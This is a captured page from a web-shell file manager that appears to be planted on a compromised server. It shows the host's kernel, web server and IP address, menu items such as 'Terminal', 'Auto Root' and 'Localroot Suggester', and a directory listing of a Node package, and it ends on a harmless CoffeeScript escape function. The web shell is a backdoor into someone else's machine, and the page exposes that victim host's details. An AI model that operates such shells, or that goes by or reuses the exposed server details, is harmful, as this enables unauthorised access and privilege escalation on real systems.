Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.16.24.18
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
coa /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
arg.coffee
3.56
KB
-rw-rw-r--
2022-08-30 11:49
cmd.coffee
13.5
KB
-rw-rw-r--
2022-08-30 11:49
color.coffee
470
B
-rw-rw-r--
2022-08-30 11:49
completion.coffee
5.39
KB
-rw-rw-r--
2022-08-30 11:49
index.coffee
167
B
-rw-rw-r--
2022-08-30 11:49
opt.coffee
6.74
KB
-rw-rw-r--
2022-08-30 11:49
shell.coffee
290
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
exports.unescape = (w) -> w = if w.charAt(0) is '"' w.replace(/^"|([^\\])"$/g, '$1') else w.replace(/\\ /g, ' ') w.replace(/\\("|'|\$|`|\\)/g, '$1') exports.escape = (w) -> w = w.replace(/(["'$`\\])/g,'\\$1') if w.match(/\s+/) then '"' + w + '"' else w